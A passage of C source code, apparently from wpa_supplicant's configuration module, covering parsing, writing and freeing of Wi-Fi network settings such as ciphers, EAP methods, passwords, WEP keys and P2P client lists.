wpa_printf(MSG_ERROR, "Line %d: no cipher values configured.", line); return -1; } return val; } #ifndef NO_CONFIG_WRITE static char * wpa_config_write_cipher(int cipher) { char *buf = os_zalloc(50); if (buf == NULL) return NULL; if (wpa_write_ciphers(buf, buf + 50, cipher, " ") < 0) { os_free(buf); return NULL; } return buf; } #endif /* NO_CONFIG_WRITE */ static int wpa_config_parse_pairwise(const struct parse_data *data, struct wpa_ssid *ssid, int line, const char *value) { int val; val = wpa_config_parse_cipher(line, value); if (val == -1) return -1; if (val & ~WPA_ALLOWED_PAIRWISE_CIPHERS) { wpa_printf(MSG_ERROR, "Line %d: not allowed pairwise cipher " "(0x%x).", line, val); return -1; } wpa_printf(MSG_MSGDUMP, "pairwise: 0x%x", val); ssid->pairwise_cipher = val; return 0; } #ifndef NO_CONFIG_WRITE static char * wpa_config_write_pairwise(const struct parse_data *data, struct wpa_ssid *ssid) { return wpa_config_write_cipher(ssid->pairwise_cipher); } #endif /* NO_CONFIG_WRITE */ static int wpa_config_parse_group(const struct parse_data *data, struct wpa_ssid *ssid, int line, const char *value) { int val; val = wpa_config_parse_cipher(line, value); if (val == -1) return -1; if (val & ~WPA_ALLOWED_GROUP_CIPHERS) { wpa_printf(MSG_ERROR, "Line %d: not allowed group cipher " "(0x%x).", line, val); return -1; } wpa_printf(MSG_MSGDUMP, "group: 0x%x", val); ssid->group_cipher = val; return 0; } #ifndef NO_CONFIG_WRITE static char * wpa_config_write_group(const struct parse_data *data, struct wpa_ssid *ssid) { return wpa_config_write_cipher(ssid->group_cipher); } #endif /* NO_CONFIG_WRITE */ static int wpa_config_parse_auth_alg(const struct parse_data *data, struct wpa_ssid *ssid, int line, const char *value) { int val = 0, last, errors = 0; char *start, *end, *buf; buf = os_strdup(value); if (buf == NULL) return -1; start = buf; while (*start != '\0') { while (*start == ' ' || *start == '\t') start++; if (*start == '\0') break; end = start; while (*end != ' ' && *end != '\t' && *end != '\0') end++; last = *end == '\0'; *end = '\0'; if (os_strcmp(start, "OPEN") == 0) val |= WPA_AUTH_ALG_OPEN; else if (os_strcmp(start, "SHARED") == 0) val |= WPA_AUTH_ALG_SHARED; else if (os_strcmp(start, "LEAP") == 0) val |= WPA_AUTH_ALG_LEAP; else { wpa_printf(MSG_ERROR, "Line %d: invalid auth_alg '%s'", line, start); errors++; } if (last) break; start = end + 1; } os_free(buf); if (val == 0) { wpa_printf(MSG_ERROR, "Line %d: no auth_alg values configured.", line); errors++; } wpa_printf(MSG_MSGDUMP, "auth_alg: 0x%x", val); ssid->auth_alg = val; return errors ? -1 : 0; } #ifndef NO_CONFIG_WRITE static char * wpa_config_write_auth_alg(const struct parse_data *data, struct wpa_ssid *ssid) { char *buf, *pos, *end; int ret; pos = buf = os_zalloc(30); if (buf == NULL) return NULL; end = buf + 30; if (ssid->auth_alg & WPA_AUTH_ALG_OPEN) { ret = os_snprintf(pos, end - pos, "%sOPEN", pos == buf ? "" : " "); if (ret < 0 || ret >= end - pos) { end[-1] = '\0'; return buf; } pos += ret; } if (ssid->auth_alg & WPA_AUTH_ALG_SHARED) { ret = os_snprintf(pos, end - pos, "%sSHARED", pos == buf ? "" : " "); if (ret < 0 || ret >= end - pos) { end[-1] = '\0'; return buf; } pos += ret; } if (ssid->auth_alg & WPA_AUTH_ALG_LEAP) { ret = os_snprintf(pos, end - pos, "%sLEAP", pos == buf ? "" : " "); if (ret < 0 || ret >= end - pos) { end[-1] = '\0'; return buf; } pos += ret; } if (pos == buf) { os_free(buf); buf = NULL; } return buf; } #endif /* NO_CONFIG_WRITE */ static int * wpa_config_parse_int_array(const char *value) { int *freqs; size_t used, len; const char *pos; used = 0; len = 10; freqs = os_calloc(len + 1, sizeof(int)); if (freqs == NULL) return NULL; pos = value; while (pos) { while (*pos == ' ') pos++; if (used == len) { int *n; size_t i; n = os_realloc_array(freqs, len * 2 + 1, sizeof(int)); if (n == NULL) { os_free(freqs); return NULL; } for (i = len; i <= len * 2; i++) n[i] = 0; freqs = n; len *= 2; } freqs[used] = atoi(pos); if (freqs[used] == 0) break; used++; pos = os_strchr(pos + 1, ' '); } return freqs; } static int wpa_config_parse_scan_freq(const struct parse_data *data, struct wpa_ssid *ssid, int line, const char *value) { int *freqs; freqs = wpa_config_parse_int_array(value); if (freqs == NULL) return -1; if (freqs[0] == 0) { os_free(freqs); freqs = NULL; } os_free(ssid->scan_freq); ssid->scan_freq = freqs; return 0; } static int wpa_config_parse_freq_list(const struct parse_data *data, struct wpa_ssid *ssid, int line, const char *value) { int *freqs; freqs = wpa_config_parse_int_array(value); if (freqs == NULL) return -1; if (freqs[0] == 0) { os_free(freqs); freqs = NULL; } os_free(ssid->freq_list); ssid->freq_list = freqs; return 0; } #ifndef NO_CONFIG_WRITE static char * wpa_config_write_freqs(const struct parse_data *data, const int *freqs) { char *buf, *pos, *end; int i, ret; size_t count; if (freqs == NULL) return NULL; count = 0; for (i = 0; freqs[i]; i++) count++; pos = buf = os_zalloc(10 * count + 1); if (buf == NULL) return NULL; end = buf + 10 * count + 1; for (i = 0; freqs[i]; i++) { ret = os_snprintf(pos, end - pos, "%s%u", i == 0 ? "" : " ", freqs[i]); if (ret < 0 || ret >= end - pos) { end[-1] = '\0'; return buf; } pos += ret; } return buf; } static char * wpa_config_write_scan_freq(const struct parse_data *data, struct wpa_ssid *ssid) { return wpa_config_write_freqs(data, ssid->scan_freq); } static char * wpa_config_write_freq_list(const struct parse_data *data, struct wpa_ssid *ssid) { return wpa_config_write_freqs(data, ssid->freq_list); } #endif /* NO_CONFIG_WRITE */ #ifdef IEEE8021X_EAPOL static int wpa_config_parse_eap(const struct parse_data *data, struct wpa_ssid *ssid, int line, const char *value) { int last, errors = 0; char *start, *end, *buf; struct eap_method_type *methods = NULL, *tmp; size_t num_methods = 0; buf = os_strdup(value); if (buf == NULL) return -1; start = buf; while (*start != '\0') { while (*start == ' ' || *start == '\t') start++; if (*start == '\0') break; end = start; while (*end != ' ' && *end != '\t' && *end != '\0') end++; last = *end == '\0'; *end = '\0'; tmp = methods; methods = os_realloc_array(methods, num_methods + 1, sizeof(*methods)); if (methods == NULL) { os_free(tmp); os_free(buf); return -1; } methods[num_methods].method = eap_peer_get_type( start, &methods[num_methods].vendor); if (methods[num_methods].vendor == EAP_VENDOR_IETF && methods[num_methods].method == EAP_TYPE_NONE) { wpa_printf(MSG_ERROR, "Line %d: unknown EAP method " "'%s'", line, start); wpa_printf(MSG_ERROR, "You may need to add support for" " this EAP method during wpa_supplicant\n" "build time configuration.\n" "See README for more information."); errors++; } else if (methods[num_methods].vendor == EAP_VENDOR_IETF && methods[num_methods].method == EAP_TYPE_LEAP) ssid->leap++; else ssid->non_leap++; num_methods++; if (last) break; start = end + 1; } os_free(buf); tmp = methods; methods = os_realloc_array(methods, num_methods + 1, sizeof(*methods)); if (methods == NULL) { os_free(tmp); return -1; } methods[num_methods].vendor = EAP_VENDOR_IETF; methods[num_methods].method = EAP_TYPE_NONE; num_methods++; wpa_hexdump(MSG_MSGDUMP, "eap methods", (u8 *) methods, num_methods * sizeof(*methods)); os_free(ssid->eap.eap_methods); ssid->eap.eap_methods = methods; return errors ? -1 : 0; } static char * wpa_config_write_eap(const struct parse_data *data, struct wpa_ssid *ssid) { int i, ret; char *buf, *pos, *end; const struct eap_method_type *eap_methods = ssid->eap.eap_methods; const char *name; if (eap_methods == NULL) return NULL; pos = buf = os_zalloc(100); if (buf == NULL) return NULL; end = buf + 100; for (i = 0; eap_methods[i].vendor != EAP_VENDOR_IETF || eap_methods[i].method != EAP_TYPE_NONE; i++) { name = eap_get_name(eap_methods[i].vendor, eap_methods[i].method); if (name) { ret = os_snprintf(pos, end - pos, "%s%s", pos == buf ? "" : " ", name); if (ret < 0 || ret >= end - pos) break; pos += ret; } } end[-1] = '\0'; return buf; } static int wpa_config_parse_password(const struct parse_data *data, struct wpa_ssid *ssid, int line, const char *value) { u8 *hash; if (os_strcmp(value, "NULL") == 0) { wpa_printf(MSG_DEBUG, "Unset configuration string 'password'"); bin_clear_free(ssid->eap.password, ssid->eap.password_len); ssid->eap.password = NULL; ssid->eap.password_len = 0; return 0; } #ifdef CONFIG_EXT_PASSWORD if (os_strncmp(value, "ext:", 4) == 0) { char *name = os_strdup(value + 4); if (name == NULL) return -1; bin_clear_free(ssid->eap.password, ssid->eap.password_len); ssid->eap.password = (u8 *) name; ssid->eap.password_len = os_strlen(name); ssid->eap.flags &= ~EAP_CONFIG_FLAGS_PASSWORD_NTHASH; ssid->eap.flags |= EAP_CONFIG_FLAGS_EXT_PASSWORD; return 0; } #endif /* CONFIG_EXT_PASSWORD */ if (os_strncmp(value, "hash:", 5) != 0) { char *tmp; size_t res_len; tmp = wpa_config_parse_string(value, &res_len); if (tmp == NULL) { wpa_printf(MSG_ERROR, "Line %d: failed to parse " "password.", line); return -1; } wpa_hexdump_ascii_key(MSG_MSGDUMP, data->name, (u8 *) tmp, res_len); bin_clear_free(ssid->eap.password, ssid->eap.password_len); ssid->eap.password = (u8 *) tmp; ssid->eap.password_len = res_len; ssid->eap.flags &= ~EAP_CONFIG_FLAGS_PASSWORD_NTHASH; ssid->eap.flags &= ~EAP_CONFIG_FLAGS_EXT_PASSWORD; return 0; } /* NtPasswordHash: hash:<32 hex digits> */ if (os_strlen(value + 5) != 2 * 16) { wpa_printf(MSG_ERROR, "Line %d: Invalid password hash length " "(expected 32 hex digits)", line); return -1; } hash = os_malloc(16); if (hash == NULL) return -1; if (hexstr2bin(value + 5, hash, 16)) { os_free(hash); wpa_printf(MSG_ERROR, "Line %d: Invalid password hash", line); return -1; } wpa_hexdump_key(MSG_MSGDUMP, data->name, hash, 16); bin_clear_free(ssid->eap.password, ssid->eap.password_len); ssid->eap.password = hash; ssid->eap.password_len = 16; ssid->eap.flags |= EAP_CONFIG_FLAGS_PASSWORD_NTHASH; ssid->eap.flags &= ~EAP_CONFIG_FLAGS_EXT_PASSWORD; return 0; } static char * wpa_config_write_password(const struct parse_data *data, struct wpa_ssid *ssid) { char *buf; if (ssid->eap.password == NULL) return NULL; #ifdef CONFIG_EXT_PASSWORD if (ssid->eap.flags & EAP_CONFIG_FLAGS_EXT_PASSWORD) { buf = os_zalloc(4 + ssid->eap.password_len + 1); if (buf == NULL) return NULL; os_memcpy(buf, "ext:", 4); os_memcpy(buf + 4, ssid->eap.password, ssid->eap.password_len); return buf; } #endif /* CONFIG_EXT_PASSWORD */ if (!(ssid->eap.flags & EAP_CONFIG_FLAGS_PASSWORD_NTHASH)) { return wpa_config_write_string( ssid->eap.password, ssid->eap.password_len); } buf = os_malloc(5 + 32 + 1); if (buf == NULL) return NULL; os_memcpy(buf, "hash:", 5); wpa_snprintf_hex(buf + 5, 32 + 1, ssid->eap.password, 16); return buf; } #endif /* IEEE8021X_EAPOL */ static int wpa_config_parse_wep_key(u8 *key, size_t *len, int line, const char *value, int idx) { char *buf, title[20]; int res; buf = wpa_config_parse_string(value, len); if (buf == NULL) { wpa_printf(MSG_ERROR, "Line %d: Invalid WEP key %d '%s'.", line, idx, value); return -1; } if (*len > MAX_WEP_KEY_LEN) { wpa_printf(MSG_ERROR, "Line %d: Too long WEP key %d '%s'.", line, idx, value); os_free(buf); return -1; } if (*len && *len != 5 && *len != 13 && *len != 16) { wpa_printf(MSG_ERROR, "Line %d: Invalid WEP key length %u - " "this network block will be ignored", line, (unsigned int) *len); } os_memcpy(key, buf, *len); str_clear_free(buf); res = os_snprintf(title, sizeof(title), "wep_key%d", idx); if (res >= 0 && (size_t) res < sizeof(title)) wpa_hexdump_key(MSG_MSGDUMP, title, key, *len); return 0; } static int wpa_config_parse_wep_key0(const struct parse_data *data, struct wpa_ssid *ssid, int line, const char *value) { return wpa_config_parse_wep_key(ssid->wep_key[0], &ssid->wep_key_len[0], line, value, 0); } static int wpa_config_parse_wep_key1(const struct parse_data *data, struct wpa_ssid *ssid, int line, const char *value) { return wpa_config_parse_wep_key(ssid->wep_key[1], &ssid->wep_key_len[1], line, value, 1); } static int wpa_config_parse_wep_key2(const struct parse_data *data, struct wpa_ssid *ssid, int line, const char *value) { return wpa_config_parse_wep_key(ssid->wep_key[2], &ssid->wep_key_len[2], line, value, 2); } static int wpa_config_parse_wep_key3(const struct parse_data *data, struct wpa_ssid *ssid, int line, const char *value) { return wpa_config_parse_wep_key(ssid->wep_key[3], &ssid->wep_key_len[3], line, value, 3); } #ifndef NO_CONFIG_WRITE static char * wpa_config_write_wep_key(struct wpa_ssid *ssid, int idx) { if (ssid->wep_key_len[idx] == 0) return NULL; return wpa_config_write_string(ssid->wep_key[idx], ssid->wep_key_len[idx]); } static char * wpa_config_write_wep_key0(const struct parse_data *data, struct wpa_ssid *ssid) { return wpa_config_write_wep_key(ssid, 0); } static char * wpa_config_write_wep_key1(const struct parse_data *data, struct wpa_ssid *ssid) { return wpa_config_write_wep_key(ssid, 1); } static char * wpa_config_write_wep_key2(const struct parse_data *data, struct wpa_ssid *ssid) { return wpa_config_write_wep_key(ssid, 2); } static char * wpa_config_write_wep_key3(const struct parse_data *data, struct wpa_ssid *ssid) { return wpa_config_write_wep_key(ssid, 3); } #endif /* NO_CONFIG_WRITE */ #ifdef CONFIG_P2P static int wpa_config_parse_go_p2p_dev_addr(const struct parse_data *data, struct wpa_ssid *ssid, int line, const char *value) { if (value[0] == '\0' || os_strcmp(value, "\"\"") == 0 || os_strcmp(value, "any") == 0) { os_memset(ssid->go_p2p_dev_addr, 0, ETH_ALEN); wpa_printf(MSG_MSGDUMP, "GO P2P Device Address any"); return 0; } if (hwaddr_aton(value, ssid->go_p2p_dev_addr)) { wpa_printf(MSG_ERROR, "Line %d: Invalid GO P2P Device Address '%s'.", line, value); return -1; } ssid->bssid_set = 1; wpa_printf(MSG_MSGDUMP, "GO P2P Device Address " MACSTR, MAC2STR(ssid->go_p2p_dev_addr)); return 0; } #ifndef NO_CONFIG_WRITE static char * wpa_config_write_go_p2p_dev_addr(const struct parse_data *data, struct wpa_ssid *ssid) { char *value; int res; if (is_zero_ether_addr(ssid->go_p2p_dev_addr)) return NULL; value = os_malloc(20); if (value == NULL) return NULL; res = os_snprintf(value, 20, MACSTR, MAC2STR(ssid->go_p2p_dev_addr)); if (res < 0 || res >= 20) { os_free(value); return NULL; } value[20 - 1] = '\0'; return value; } #endif /* NO_CONFIG_WRITE */ static int wpa_config_parse_p2p_client_list(const struct parse_data *data, struct wpa_ssid *ssid, int line, const char *value) { const char *pos; u8 *buf, *n, addr[ETH_ALEN]; size_t count; buf = NULL; count = 0; pos = value; while (pos && *pos) { while (*pos == ' ') pos++; if (hwaddr_aton(pos, addr)) { if (count == 0) { wpa_printf(MSG_ERROR, "Line %d: Invalid " "p2p_client_list address '%s'.", line, value); os_free(buf); return -1; } /* continue anyway since this could have been from a * truncated configuration file line */ wpa_printf(MSG_INFO, "Line %d: Ignore likely " "truncated p2p_client_list address '%s'", line, pos); } else { n = os_realloc_array(buf, count + 1, ETH_ALEN); if (n == NULL) { os_free(buf); return -1; } buf = n; os_memmove(buf + ETH_ALEN, buf, count * ETH_ALEN); os_memcpy(buf, addr, ETH_ALEN); count++; wpa_hexdump(MSG_MSGDUMP, "p2p_client_list", addr, ETH_ALEN); } pos = os_strchr(pos, ' '); } os_free(ssid->p2p_client_list); ssid->p2p_client_list = buf; ssid->num_p2p_clients = count; return 0; } #ifndef NO_CONFIG_WRITE static char * wpa_config_write_p2p_client_list(const struct parse_data *data, struct wpa_ssid *ssid) { char *value, *end, *pos; int res; size_t i; if (ssid->p2p_client_list == NULL || ssid->num_p2p_clients == 0) return NULL; value = os_malloc(20 * ssid->num_p2p_clients); if (value == NULL) return NULL; pos = value; end = value + 20 * ssid->num_p2p_clients; for (i = ssid->num_p2p_clients; i > 0; i--) { res = os_snprintf(pos, end - pos, MACSTR " ", MAC2STR(ssid->p2p_client_list + (i - 1) * ETH_ALEN)); if (res < 0 || res >= end - pos) { os_free(value); return NULL; } pos += res; } if (pos > value) pos[-1] = '\0'; return value; } #endif /* NO_CONFIG_WRITE */ static int wpa_config_parse_psk_list(const struct parse_data *data, struct wpa_ssid *ssid, int line, const char *value) { struct psk_list_entry *p; const char *pos; p = os_zalloc(sizeof(*p)); if (p == NULL) return -1; pos = value; if (os_strncmp(pos, "P2P-", 4) == 0) { p->p2p = 1; pos += 4; } if (hwaddr_aton(pos, p->addr)) { wpa_printf(MSG_ERROR, "Line %d: Invalid psk_list address '%s'", line, pos); os_free(p); return -1; } pos += 17; if (*pos != '-') { wpa_printf(MSG_ERROR, "Line %d: Invalid psk_list '%s'", line, pos); os_free(p); return -1; } pos++; if (hexstr2bin(pos, p->psk, PMK_LEN) || pos[PMK_LEN * 2] != '\0') { wpa_printf(MSG_ERROR, "Line %d: Invalid psk_list PSK '%s'", line, pos); os_free(p); return -1; } dl_list_add(&ssid->psk_list, &p->list); return 0; } #ifndef NO_CONFIG_WRITE static char * wpa_config_write_psk_list(const struct parse_data *data, struct wpa_ssid *ssid) { return NULL; } #endif /* NO_CONFIG_WRITE */ #endif /* CONFIG_P2P */ /* Helper macros for network block parser */ #ifdef OFFSET #undef OFFSET #endif /* OFFSET */ /* OFFSET: Get offset of a variable within the wpa_ssid structure */ #define OFFSET(v) ((void *) &((struct wpa_ssid *) 0)->v) /* STR: Define a string variable for an ASCII string; f = field name */ #ifdef NO_CONFIG_WRITE #define _STR(f) #f, wpa_config_parse_str, OFFSET(f) #define _STRe(f) #f, wpa_config_parse_str, OFFSET(eap.f) #else /* NO_CONFIG_WRITE */ #define _STR(f) #f, wpa_config_parse_str, wpa_config_write_str, OFFSET(f) #define _STRe(f) #f, wpa_config_parse_str, wpa_config_write_str, OFFSET(eap.f) #endif /* NO_CONFIG_WRITE */ #define STR(f) _STR(f), NULL, NULL, NULL, 0 #define STRe(f) _STRe(f), NULL, NULL, NULL, 0 #define STR_KEY(f) _STR(f), NULL, NULL, NULL, 1 #define STR_KEYe(f) _STRe(f), NULL, NULL, NULL, 1 /* STR_LEN: Define a string variable with a separate variable for storing the * data length. Unlike STR(), this can be used to store arbitrary binary data * (i.e., even nul termination character). */ #define _STR_LEN(f) _STR(f), OFFSET(f ## _len) #define _STR_LENe(f) _STRe(f), OFFSET(eap.f ## _len) #define STR_LEN(f) _STR_LEN(f), NULL, NULL, 0 #define STR_LENe(f) _STR_LENe(f), NULL, NULL, 0 #define STR_LEN_KEY(f) _STR_LEN(f), NULL, NULL, 1 /* STR_RANGE: Like STR_LEN(), but with minimum and maximum allowed length * explicitly specified. */ #define _STR_RANGE(f, min, max) _STR_LEN(f), (void *) (min), (void *) (max) #define STR_RANGE(f, min, max) _STR_RANGE(f, min, max), 0 #define STR_RANGE_KEY(f, min, max) _STR_RANGE(f, min, max), 1 #ifdef NO_CONFIG_WRITE #define _INT(f) #f, wpa_config_parse_int, OFFSET(f), (void *) 0 #define _INTe(f) #f, wpa_config_parse_int, OFFSET(eap.f), (void *) 0 #else /* NO_CONFIG_WRITE */ #define _INT(f) #f, wpa_config_parse_int, wpa_config_write_int, \ OFFSET(f), (void *) 0 #define _INTe(f) #f, wpa_config_parse_int, wpa_config_write_int, \ OFFSET(eap.f), (void *) 0 #endif /* NO_CONFIG_WRITE */ /* INT: Define an integer variable */ #define INT(f) _INT(f), NULL, NULL, 0 #define INTe(f) _INTe(f), NULL, NULL, 0 /* INT_RANGE: Define an integer variable with allowed value range */ #define INT_RANGE(f, min, max) _INT(f), (void *) (min), (void *) (max), 0 /* FUNC: Define a configuration variable that uses a custom function for * parsing and writing the value. */ #ifdef NO_CONFIG_WRITE #define _FUNC(f) #f, wpa_config_parse_ ## f, NULL, NULL, NULL, NULL #else /* NO_CONFIG_WRITE */ #define _FUNC(f) #f, wpa_config_parse_ ## f, wpa_config_write_ ## f, \ NULL, NULL, NULL, NULL #endif /* NO_CONFIG_WRITE */ #define FUNC(f) _FUNC(f), 0 #define FUNC_KEY(f) _FUNC(f), 1 /* * Table of network configuration variables. This table is used to parse each * network configuration variable, e.g., each line in wpa_supplicant.conf file * that is inside a network block. * * This table is generated using the helper macros defined above and with * generous help from the C pre-processor. The field name is stored as a string * into .name and for STR and INT types, the offset of the target buffer within * struct wpa_ssid is stored in .param1. .param2 (if not NULL) is similar * offset to the field containing the length of the configuration variable. * .param3 and .param4 can be used to mark the allowed range (length for STR * and value for INT). * * For each configuration line in wpa_supplicant.conf, the parser goes through * this table and select the entry that matches with the field name. The parser * function (.parser) is then called to parse the actual value of the field. * * This kind of mechanism makes it easy to add new configuration parameters, * since only one line needs to be added into this table and into the * struct wpa_ssid definition if the new variable is either a string or * integer. More complex types will need to use their own parser and writer * functions. */ static const struct parse_data ssid_fields[] = { { STR_RANGE(ssid, 0, MAX_SSID_LEN) }, { INT_RANGE(scan_ssid, 0, 1) }, { FUNC(bssid) }, { FUNC_KEY(psk) }, { FUNC(proto) }, { FUNC(key_mgmt) }, { INT(bg_scan_period) }, { FUNC(pairwise) }, { FUNC(group) }, { FUNC(auth_alg) }, { FUNC(scan_freq) }, { FUNC(freq_list) }, #ifdef IEEE8021X_EAPOL { FUNC(eap) }, { STR_LENe(identity) }, { STR_LENe(anonymous_identity) }, { FUNC_KEY(password) }, { STRe(ca_cert) }, { STRe(ca_path) }, { STRe(client_cert) }, { STRe(private_key) }, { STR_KEYe(private_key_passwd) }, { STRe(dh_file) }, { STRe(subject_match) }, { STRe(altsubject_match) }, { STRe(domain_suffix_match) }, { STRe(ca_cert2) }, { STRe(ca_path2) }, { STRe(client_cert2) }, { STRe(private_key2) }, { STR_KEYe(private_key2_passwd) }, { STRe(dh_file2) }, { STRe(subject_match2) }, { STRe(altsubject_match2) }, { STRe(domain_suffix_match2) }, { STRe(phase1) }, { STRe(phase2) }, { STRe(pcsc) }, { STR_KEYe(pin) }, { STRe(engine_id) }, { STRe(key_id) }, { STRe(cert_id) }, { STRe(ca_cert_id) }, { STR_KEYe(pin2) }, { STRe(engine2_id) }, { STRe(key2_id) }, { STRe(cert2_id) }, { STRe(ca_cert2_id) }, { INTe(engine) }, { INTe(engine2) }, { INT(eapol_flags) }, { INTe(sim_num) }, { STRe(openssl_ciphers) }, #endif /* IEEE8021X_EAPOL */ { FUNC_KEY(wep_key0) }, { FUNC_KEY(wep_key1) }, { FUNC_KEY(wep_key2) }, { FUNC_KEY(wep_key3) }, { INT(wep_tx_keyidx) }, { INT(priority) }, #ifdef IEEE8021X_EAPOL { INT(eap_workaround) }, { STRe(pac_file) }, { INTe(fragment_size) }, { INTe(ocsp) }, #endif /* IEEE8021X_EAPOL */ { INT_RANGE(mode, 0, 4) }, { INT_RANGE(proactive_key_caching, 0, 1) }, { INT_RANGE(disabled, 0, 2) }, { STR(id_str) }, #ifdef CONFIG_IEEE80211W { INT_RANGE(ieee80211w, 0, 2) }, #endif /* CONFIG_IEEE80211W */ { INT_RANGE(peerkey, 0, 1) }, { INT_RANGE(mixed_cell, 0, 1) }, { INT_RANGE(frequency, 0, 65000) }, { INT(wpa_ptk_rekey) }, { STR(bgscan) }, { INT_RANGE(ignore_broadcast_ssid, 0, 2) }, #ifdef CONFIG_P2P { FUNC(go_p2p_dev_addr) }, { FUNC(p2p_client_list) }, { FUNC(psk_list) }, #endif /* CONFIG_P2P */ #ifdef CONFIG_HT_OVERRIDES { INT_RANGE(disable_ht, 0, 1) }, { INT_RANGE(disable_ht40, -1, 1) }, { INT_RANGE(disable_sgi, 0, 1) }, { INT_RANGE(disable_ldpc, 0, 1) }, { INT_RANGE(ht40_intolerant, 0, 1) }, { INT_RANGE(disable_max_amsdu, -1, 1) }, { INT_RANGE(ampdu_factor, -1, 3) }, { INT_RANGE(ampdu_density, -1, 7) }, { STR(ht_mcs) }, #endif /* CONFIG_HT_OVERRIDES */ #ifdef CONFIG_VHT_OVERRIDES { INT_RANGE(disable_vht, 0, 1) }, { INT(vht_capa) }, { INT(vht_capa_mask) }, { INT_RANGE(vht_rx_mcs_nss_1, -1, 3) }, { INT_RANGE(vht_rx_mcs_nss_2, -1, 3) }, { INT_RANGE(vht_rx_mcs_nss_3, -1, 3) }, { INT_RANGE(vht_rx_mcs_nss_4, -1, 3) }, { INT_RANGE(vht_rx_mcs_nss_5, -1, 3) }, { INT_RANGE(vht_rx_mcs_nss_6, -1, 3) }, { INT_RANGE(vht_rx_mcs_nss_7, -1, 3) }, { INT_RANGE(vht_rx_mcs_nss_8, -1, 3) }, { INT_RANGE(vht_tx_mcs_nss_1, -1, 3) }, { INT_RANGE(vht_tx_mcs_nss_2, -1, 3) }, { INT_RANGE(vht_tx_mcs_nss_3, -1, 3) }, { INT_RANGE(vht_tx_mcs_nss_4, -1, 3) }, { INT_RANGE(vht_tx_mcs_nss_5, -1, 3) }, { INT_RANGE(vht_tx_mcs_nss_6, -1, 3) }, { INT_RANGE(vht_tx_mcs_nss_7, -1, 3) }, { INT_RANGE(vht_tx_mcs_nss_8, -1, 3) }, #endif /* CONFIG_VHT_OVERRIDES */ { INT(ap_max_inactivity) }, { INT(dtim_period) }, { INT(beacon_int) }, #ifdef CONFIG_MACSEC { INT_RANGE(macsec_policy, 0, 1) }, #endif /* CONFIG_MACSEC */ #ifdef CONFIG_HS20 { INT(update_identifier) }, #endif /* CONFIG_HS20 */ { INT_RANGE(mac_addr, 0, 2) }, }; #undef OFFSET #undef _STR #undef STR #undef STR_KEY #undef _STR_LEN #undef STR_LEN #undef STR_LEN_KEY #undef _STR_RANGE #undef STR_RANGE #undef STR_RANGE_KEY #undef _INT #undef INT #undef INT_RANGE #undef _FUNC #undef FUNC #undef FUNC_KEY #define NUM_SSID_FIELDS ARRAY_SIZE(ssid_fields) /** * wpa_config_add_prio_network - Add a network to priority lists * @config: Configuration data from wpa_config_read() * @ssid: Pointer to the network configuration to be added to the list * Returns: 0 on success, -1 on failure * * This function is used to add a network block to the priority list of * networks. This must be called for each network when reading in the full * configuration. In addition, this can be used indirectly when updating * priorities by calling wpa_config_update_prio_list(). */ int wpa_config_add_prio_network(struct wpa_config *config, struct wpa_ssid *ssid) { int prio; struct wpa_ssid *prev, **nlist; /* * Add to an existing priority list if one is available for the * configured priority level for this network. */ for (prio = 0; prio < config->num_prio; prio++) { prev = config->pssid[prio]; if (prev->priority == ssid->priority) { while (prev->pnext) prev = prev->pnext; prev->pnext = ssid; return 0; } } /* First network for this priority - add a new priority list */ nlist = os_realloc_array(config->pssid, config->num_prio + 1, sizeof(struct wpa_ssid *)); if (nlist == NULL) return -1; for (prio = 0; prio < config->num_prio; prio++) { if (nlist[prio]->priority < ssid->priority) { os_memmove(&nlist[prio + 1], &nlist[prio], (config->num_prio - prio) * sizeof(struct wpa_ssid *)); break; } } nlist[prio] = ssid; config->num_prio++; config->pssid = nlist; return 0; } /** * wpa_config_update_prio_list - Update network priority list * @config: Configuration data from wpa_config_read() * Returns: 0 on success, -1 on failure * * This function is called to update the priority list of networks in the * configuration when a network is being added or removed. This is also called * if a priority for a network is changed. */ int wpa_config_update_prio_list(struct wpa_config *config) { struct wpa_ssid *ssid; int ret = 0; os_free(config->pssid); config->pssid = NULL; config->num_prio = 0; ssid = config->ssid; while (ssid) { ssid->pnext = NULL; if (wpa_config_add_prio_network(config, ssid) < 0) ret = -1; ssid = ssid->next; } return ret; } #ifdef IEEE8021X_EAPOL static void eap_peer_config_free(struct eap_peer_config *eap) { os_free(eap->eap_methods); bin_clear_free(eap->identity, eap->identity_len); os_free(eap->anonymous_identity); bin_clear_free(eap->password, eap->password_len); os_free(eap->ca_cert); os_free(eap->ca_path); os_free(eap->client_cert); os_free(eap->private_key); str_clear_free(eap->private_key_passwd); os_free(eap->dh_file); os_free(eap->subject_match); os_free(eap->altsubject_match); os_free(eap->domain_suffix_match); os_free(eap->ca_cert2); os_free(eap->ca_path2); os_free(eap->client_cert2); os_free(eap->private_key2); str_clear_free(eap->private_key2_passwd); os_free(eap->dh_file2); os_free(eap->subject_match2); os_free(eap->altsubject_match2); os_free(eap->domain_suffix_match2); os_free(eap->phase1); os_free(eap->phase2); os_free(eap->pcsc); str_clear_free(eap->pin); os_free(eap->engine_id); os_free(eap->key_id); os_free(eap->cert_id); os_free(eap->ca_cert_id); os_free(eap->key2_id); os_free(eap->cert2_id); os_free(eap->ca_cert2_id); str_clear_free(eap->pin2); os_free(eap->engine2_id); os_free(eap->otp); os_free(eap->pending_req_otp); os_free(eap->pac_file); bin_clear_free(eap->new_password, eap->new_password_len); str_clear_free(eap->external_sim_resp); os_free(eap->openssl_ciphers); } #endif /* IEEE8021X_EAPOL */ /** * wpa_config_free_ssid - Free network/ssid configuration data * @ssid: Configuration data for the network * * This function frees all resources allocated for the network configuration * data. */ void wpa_config_free_ssid(struct wpa_ssid *ssid) { struct psk_list_entry *psk; os_free(ssid->ssid); os_memset(ssid->psk, 0, sizeof(ssid->psk)); str_clear_free(ssid->passphrase); os_free(ssid->ext_psk); #ifdef IEEE8021X_EAPOL eap_peer_config_free(&ssid->eap); #endif /* IEEE8021X_EAPOL */ os_free(ssid->id_str); os_free(ssid->scan_freq); os_free(ssid->freq_list); os_free(ssid->bgscan); os_free(ssid->p2p_client_list); #ifdef CONFIG_HT_OVERRIDES os_free(ssid->ht_mcs); #endif /* CONFIG_HT_OVERRIDES */ while ((psk = dl_list_first(&ssid->psk_list, struct psk_list_entry, list))) { dl_list_del(&psk->list); os_free(psk); } os_free(ssid); } void wpa_config_free_cred(struct wpa_cred *cred) { size_t i; os_free(cred->realm); str_clear_free(cred->username); str_clear_free(cred->password); os_free(cred->ca_cert); os_free(cred->client_cert); os_free(cred->private_key); str_clear_free(cred->private_key_passwd); os_free(cred->imsi); str_clear_free(cred->milenage); for (i = 0; i < cred->num_domain; i++) os_free(cred->domain[i]); os_free(cred->domain); 